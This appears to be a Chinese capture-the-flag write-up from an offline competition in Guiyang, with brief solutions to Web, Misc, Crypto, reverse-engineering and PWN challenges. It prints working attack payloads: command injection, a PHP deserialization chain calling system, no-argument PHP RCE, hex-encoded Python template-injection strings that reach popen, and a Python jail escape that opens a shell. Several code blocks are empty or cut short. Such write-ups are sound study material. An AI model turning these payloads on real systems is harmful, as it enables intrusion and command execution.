贵阳线下约饭局,线下赛是模拟靶场,难度一般,断网比较坑…
Web
仔细ping
扫描文件发现flag.php,利用nl读文件
1 | GET /?ip=nl%20flag.php |
pop
利用fast Destruct绕过报错,pop链(TT->des —-> JJ->toString —-> MM->invoke —-> JJ->evil)
1 |
|
无disable_function
1 | O:2:"TT":2:{s:3:"key";O:2:"JJ":1:{s:3:"obj";O:2:"MM":2:{s:4:"name";s:8:"JJ::evil";s:1:"c";s:18:"system('cat /flag');";}}s:1:"c";N; |
JUST_LFI
改的原题
https://ctftime.org/writeup/35786
LFI读文件,获取app.py以及key,直接带回显不行,采用原方式带回显
1 | import base64 |
May_be
php无参数RCE
1 |
|
利用全局变量进RCE
1 | a=system(end(reset(get_defined_vars())));&b=ls -al / |
cp提权
Hackerconfused
利用glob协议猜后门文件名
1 | 构造pop链读文件 |
1 |
|
后门文件
爆破解密,获取webshell密码
1 |
|
1 | flag{73XF7TntgDXrK3dQXSBvhuy3QJTH4vvr} |
notrce
1 |
|
没过滤引号、问号、sed
完美网站
文件包含读tupian.png,下载下来
一个简单计算,放Burp爆破
it ‘s time
Python SSTI
遍历可用类
1 | {%print(0|attr("\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f")|attr("\x5f\x5f\x62\x61\x73\x65\x73\x5f\x5f")|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")(0)|attr("\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f")()|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")(202)|attr("\x5f\x5f\x69\x6e\x69\x74\x5f\x5f")|attr("\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f"))%} |
os._wrap_close调popen
1 | {%print(0|attr("\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f")|attr("\x5f\x5f\x62\x61\x73\x65\x73\x5f\x5f")|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")(0)|attr("\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f")()|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")(117)|attr("\x5f\x5f\x69\x6e\x69\x74\x5f\x5f")|attr("\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f")|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")("\x70open")("\x63\x61\x74\x20\x2f\x66\x31\x61\x67\x5f\x67\x34\x6c\x66\x63\x64\x65\x63\x64\x64\x65\x66\x65\x77\x66\x65\x62\x67\x65")|attr("read")())%} |
不太喜欢flask的开发
弱口令、猜jwt key 也为tomcat
发现还是SSTI,发现过滤了下划线 read,部分编码绕过读文件
Misc
time
时间戳
1 | chr(int(os.path.getmtime(file.txt)-1124789000)) |
传说中的小黑
分离之后解密获取密码,补个jpg头
FFD8FFE0
wordexcelppt
kali打开发现隐藏xml
base64转图片
图片的秘密
easymisc
docker load –input ./game.tar
559.gif拖出来 拼二维码
cb0x-new
1 | char * test(char *aaa){ |
Base64 encode
j@il-new
python jail逃逸
1 | "(__builtins__:=__import__('os'))and(lambda:system)()('sh') |
1 | from pwn import remote |
Crypto
math
1 | from sage.all import * |
eezzrrssaa
1 | from Crypto.Util.number import * |
Re
rust
查看V8发现提示信息
分析V4发现需要爆破的为V8前17位字符
PWN
easynote
1 | #!/usr/bin/python3 |
pwn4
1 | #!/usr/bin/python3 |